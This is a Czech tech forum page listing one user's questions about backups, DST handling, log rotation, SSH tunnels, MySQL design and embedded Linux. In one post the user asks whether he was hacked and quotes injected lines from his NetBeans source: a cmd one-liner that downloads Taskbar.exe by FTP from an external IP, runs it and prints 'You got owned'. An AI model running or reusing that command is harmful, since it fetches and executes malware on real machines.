Zobrazit příspěvky

Tato sekce Vám umožňuje zobrazit všechny příspěvky tohoto uživatele. Prosím uvědomte si, že můžete vidět příspěvky pouze z oblastí Vám přístupných.


Témata - prezek

Stran: [1] 2
1
Zdravím,
jaký byste doporučili levný způsob zálohování pro 20 PC s Windows a 2 Windows servery. Já jsem soukromě používal Duplicati, ale verze 2.0 je experimentální. Líbí se mi, že je kontrola souborů pro zálohování rychlá a že má webové rozhraní (možnost kontroly zálohování na dálku), ale bojím se to doporučit - nedokážu odhadnout spolehlivost.

Díky, Petr

2
Vývoj / Detekce letního času
« kdy: 24. 03. 2017, 18:04:49 »
Zdravím, je v Linuxu nějaká možnost spustit příkaz při přechodu mezi letním a zimním časem?
K Raspberry mám připojené zařízení, které bohužel nepoužívá klasické unixtimestamp počítadlo, ale celý datum a čas a nepřechází automaticky mezi letním a zimním časem. Po změně času tedy musím měnit čas v zařízení. Zatím jsem to dělal tak, že jsem si spočítal, jak dlouhý sleep mám použít a nechal běžet tento nepřehledný příkaz:
Kód: [Vybrat]
((sleep 23400;echo "">>log.log;date >> log.log;./modbusClient setTime >> log.log)&)&Rád bych to nějak lépe zautomatizoval.
Byla by možnost při startu a každou celou hodinu kontrolovat časovou zónu a v případě změny provézt nastavení, ale nepřijde mi to moc "čisté".
 Díky, Petr

3
Software / Software pro prohlížení logů
« kdy: 05. 12. 2016, 13:20:16 »
Zdravím.
Při vývoji programů generuji logy, ve kterých pak hledám zajímavé informace.
Dopředu nevím, co zrovna budu potřebovat, a tak do nich sypu cca 5000 řádků/minutu.
Důležité záznamy pak hledám pomocí regulárních výrazů v PSPadu. Je to ale pomalé a někdy mi chybí porovnání pořadí dějů.
Líbilo by se mi:
  • barevně zvýrazněné pozice určitých textů.
  • přepínat mezi vyhledanými řádky a celým souborem se zaměřením daných řádků.
  • vygenerování grafu s časovou s několika řadami dat z textu
  • historie hledání

Jak procházíte logy vy? Znáte nějaký user friendly sw pro Windows/Linux Mint, který by splňoval mé představy, případně měl jiné užitečné vychytávky?
Díky, Petr

4
Hardware / Restart USB subsystému
« kdy: 23. 05. 2016, 15:28:35 »
Zdravím, nevíte jestli je možné restartovat USB bez restartu systému? Mám tablet s Androidem a potřebuju ho mít trvale spojený přes USB. Bohužel se mi občas odhlásí od USB a pak ho není možné opět přihlásit, dokud neprovedu restart tabletu.

Díky, Petr

5
Software / Přesměrování výstupu do /var/log
« kdy: 13. 04. 2016, 08:57:09 »
Zdravím. Potřeboval bych přesměrovat standardní výstup programu tak, aby se mi logoval a logy prováděly rotaci. Zatím provádím logování takto:
Kód: [Vybrat]
(((while(true) do /usr/bin/java -jar /root/dist/mujprogram.jar;sleep 10;done) >>/var/log/mujprogram.log 2>&1 </dev/null)&)&
Program je docela dost ukecaný (protože dopředu nevím, co nemusím logovat) a tak mi log rychle bobtná. Dá se nějak jednoduše zařídit přesměrování tak, aby log rotoval?

Díky Petr

6
Odkladiště / Přepočet GMT na lokální čas
« kdy: 07. 03. 2016, 10:37:54 »
Zdravím, potřeboval bych zobrazovat místní čas v předem známé lokalitě (konkrétně Moskva). K dispozici mám GMT z GPS.
Poradil by mi někdo prosím, kde zjistit jak přepočítat čas?
Nejedná se jen o časovou zónu, ale i o to, kdy se přechází mezi letním a zimním časem. K dispozici mám sice embedded Linux, ale z roku 2012, ale od té doby se (podle novinových článků) podmínky změnily. Navíc mi občas zatuhne localtime_r, takže jsem nucen počítat letní/zimní čas sám. Potřeboval bych důvěryhodnou přesnou informaci (letenky do Moskvy v případě nutnosti opravy chyby nejsou zadarmo).
Díky, Petr

7
Software / SMS a internet pomocí user space device driveru?
« kdy: 17. 12. 2015, 09:45:00 »
Zdravím. Mám Raspberry Pi s GPRS modemem připojený přes převodník USB<->Seriový port a při aktivním internetovém připojení bych potřeboval přijímat SMS. Internet funguje přes ppp protokol. Pppd startuji pomocí wvdialu. Myslel jsem, že bych mezi pppd a soubor ovladače sériového portu (/dev/ttyUSB0) vložil virtuální soubor, ve kterém bych mohl komunikaci přerušit, přečíst a poslat SMS a pak zase pokračovat. Pokud víte o lepším řešení, tak sem s ním.

Jde vytvořit v user space virtuální soubor tak, abych měl plnou kontrolu nad tím, co z něho programy čtou a co zapisují?(v user space simulovat character device)

Díky, Petr

8
Server / SSH k privátní IP přes server
« kdy: 10. 11. 2015, 11:25:00 »
Ahoj. Mám raspberry PI ("malina"), které je GPRS modemem připojeno na internet a rád bych k němu měl přístup přes ssh.
Nemám k dispozici počítač s veřejnou adresou, ale můžu nastavit NAT(s pevnou veřejnou IPv4), aby mi forwardoval porty na ubuntu ve VirtualBoxu ("server").

Představoval bych si to takto:
1) "server" poslochá přes NAT na portu 1234 a na portu 2345.
2) "malina" se spojí se "serverem" přes NAT na portu 1234.
3) klient se připojí k "serveru" přes NAT na portu 2345 a tím naváže ssh spojení s "malinou"

Dokázal by mi někdo poradit, jak na to?
Díky, Petr

9
Vývoj / MySQL - jedna velká tabulka, nebo mnoho malých
« kdy: 16. 07. 2015, 16:43:03 »
Zdravím,
potřebuju sbírat data a pak zpracovávat. Dejme tomu, že mám 100 robotů, kteří se kteří občas navštíví nějakou z 20 místností. Každý pohyb a každá operace, kterou provedou v místnostech se v místnosti detekuje a zaznamenává. Dat bude přibližně okolo milionu řádků na každou místnost. Někde více, někde méně. Při zpracování se může hledět na to, co dělal konkrétní robot v určitém časovém intervalu, nebo na to, co se dělo v konkrétní místnosti v určitém časovém intervalu.
Je lepší mít jednu velkou tabulku (cca 20 mil. řádků) pro všechny místnosti a uživatele? Nebo data rozdělit do 120ti tabulek a každá záznam mít v příslušné tabulce robota a v tabulce místnosti.

Předem dík za rady, Petr

10
Sítě / Dostal se někdo do mého počítače?
« kdy: 03. 12. 2014, 15:36:08 »
Chvilku po otevření NetBeans jsem si všiml, že mám ve zdrojovém kódu nové (a neuložené) řádky. 

Kód: [Vybrat]

cmd /c echo open 202.96.125.98 21 >> ik &echo user test test >> ik &echo binary >> ik &echo get Taskbar.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &Taskbar.exe &exit
echo You got owned

Nesetkal jste se s tím někdo?

11
Distribuce / Zpřístupnění zápisu do oddílu v Androidu
« kdy: 07. 05. 2014, 16:49:07 »
Zdravím. Mám Androidový tablet (Modecom FreeTAB 8001 HD X2, Android 4.2.2) a potřeboval bych zapisovat do systémového oddílu. Root práva mám, ale nedaří se mi přemountovat do rw.
Kód: [Vybrat]
255|shell@android:/ # mount -o rw,remount /system
mount -o rw,remount /system
mount: Read-only file system

255|shell@android:/ # mount
...
/dev/block/system /system ext4 [b]ro[/b],nodev,noatime,user_xattr,barrier=0,data=ordered 0 0
...

U oddílu není hardwarové omezení zápisu - v recovery je možné data na systémovém oddílu měnit pomocí podepsaných zazipovaných updatů, ale stává se mi, že se nenakopíruje celý soubor.
Nevíte jak na to?

12
Software / Ctrl+S zastavuje sériové porty
« kdy: 24. 03. 2014, 10:32:47 »
Zdravím.
Mám desku s embedded Linuxem a pokud do terminálu (přes sériovou linku) pošlu Ctrl+S, tak se mi vypnou všechny sériové porty. Dá se to nějak globálně zakázat? Pomáhá přenastavení tty (stty -F /dev/ttySAC1 -ixon), ale při inicializaci terminálu (např. po Ctrl+D) se zase nastavení ztratí. Myslím, že by mohlo pomoct změnit defaultní nastavení tty, ale nevím jak na to. Předem dík za rady, Petr

13
Vývoj / Zobrazení GUI vzdálené Java aplikace
« kdy: 05. 02. 2014, 16:54:16 »
Zdravím. Na serveru mi poběží aplikace napsaná v Javě a bylo by dobré, kdybych k ní mohl přistupovat vzdáleně. Je nějaká jednoduchá možnost, jak to udělat? Nebo musím napsat 2 aplikace - jednu serverovou a jednu jako klient, která bude se serverem mluvit po síti? 

14
Server / Superlevný server
« kdy: 28. 11. 2013, 15:28:17 »
Potřeboval bych server, na kterém bych provozoval vlastní aplikace. Požadavky jsou:
1. nízká cena pořízení a zprovoznění
2. nízká cena provozu
3. snadná obsluha (což se promítá i do 1. a 2.)
4. komunikace tcp i udp bez nutnosti http
5. apache, php, mysql...

Bod 4 zřejmě vyřazuje levné hostingy. Dat na serveru bude několik GB a mám zkušenost s virtuálním privátním serverem 40,-/64MB RAM za měsíc že 64MB RAM na serveru je dost málo, takže VPS by vyšlo poměrně draze na měsíčních poplatcích.
Jako schůdnou možnost vidím koupit https://www.olimex.com/Products/OLinuXino/A20/A20-OLinuXino-MICRO-4GB/open-source-hardware a nebo http://store.r0ck.me/products/cubieboard2 s USB flash diskem na data. U olinuxina se mi líbí rozsah napájecího napětí, ale nevím, jestli je možné nahrát Linux do NAND, což by u cubieboardu2 mělo jít.
Jestli je to nesmysl, nebo mi můžete pomoct rozhodnout mezi A20-OLinuXinem-MICRO-4GB a cubiebordem2, tak se prosím ozvěte.


15
Zdravím, většinou píšu programy pro mikroprocesory v NetBeans a jednotlivé programy spravuji pomocí subversion (v NetBeans stačí 3 kliknutí na commit, nebo update a jednoduše se dostanu k historickým souborům). Pracuji ve Windows XP a rád bych si zautomatizoval synchronizaci s notebookem a zálohování (často zapomenu z notebooku zazálohovat data a když je potřebuji, tak notebook leží vypnutý 10 km ode mě).
Zatím synchronizuji a zálohuji ručně přes svn server (který běží na Rapsberry Pi). Svn adresář na serveru občas zabalím do tar.gz a zazálohuji na email. Co doporučujete? Zůstat u svn, nebo přejít na git či jiný správce verzí? Synchronizovat a zálohovat pomocí správy verzí a adresář občas zabalit a uložit na jiný HW, nebo používat rsync, rdiff-backup apod?
Díky, Petr

Stran: [1] 2